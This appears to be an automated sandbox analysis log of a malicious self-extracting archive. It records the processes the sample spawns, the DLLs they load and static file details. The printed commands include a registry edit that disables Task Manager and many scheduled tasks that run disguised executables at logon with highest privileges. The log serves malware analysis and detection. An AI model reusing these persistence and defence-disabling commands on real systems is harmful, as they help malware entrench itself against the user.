Source: unknown | Process created: C:\Users\user\Desktop\1znAXdPcM5.exe "C:\Users\user\Desktop\1znAXdPcM5.exe"
Source: C:\Users\user\Desktop\1znAXdPcM5.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe"
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 8 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 5 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Agentcomponentbrokermonitordhcp" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown | Process created: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown | Process created: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ktmw32.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rasman.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: winnsi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rasadhlp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: edputil.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: dwrite.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: wbemcomn.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: amsi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: userenv.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: winmm.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: winmmbase.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: mmdevapi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: devobj.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ksuser.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: avrt.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: audioses.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: powrprof.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: umpdc.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: msacm32.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: midimap.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: windowscodecs.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ntmarta.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: dpapi.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: mscoree.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: apphelp.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: version.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: wldp.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: profapi.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: 1znAXdPcM5.exeStatic file information: File size 2236943 > 1048576
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: 1znAXdPcM5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 1znAXdPcM5.exe
                                    Source: 1znAXdPcM5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: 1znAXdPcM5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: 1znAXdPcM5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: 1znAXdPcM5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: 1znAXdPcM5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeFile created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\__tmp_rar_sfx_access_check_7066140
                                    Source: 1znAXdPcM5.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059F640 push ecx; ret 0_2_0059F653
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059EB78 push eax; ret 0_2_0059EB96
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9B7D5394 push ds; ret 5_2_00007FFD9B7D5397
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9B7D4B4F pushad ; retf 5_2_00007FFD9B7D4B55
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9B7D00AD pushad ; iretd 5_2_00007FFD9B7D00C1
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9B933033 push ebx; retn 0009h5_2_00007FFD9B933034
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBC62C5 push ebp; ret 5_2_00007FFD9BBC62C8
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBCDF45 push edi; ret 5_2_00007FFD9BBCDF46
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBC7F4E push ss; ret 5_2_00007FFD9BBC7F5D
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBCDE82 push esi; ret 5_2_00007FFD9BBCDE83
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBCE52F push edi; ret 5_2_00007FFD9BBCE530
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBCE504 push eax; ret 5_2_00007FFD9BBCE505
                                    Source: Agentcomponentbrokermonitordhcp.exe.0.dr Static PE information: section name: .text entropy: 7.537640943300724
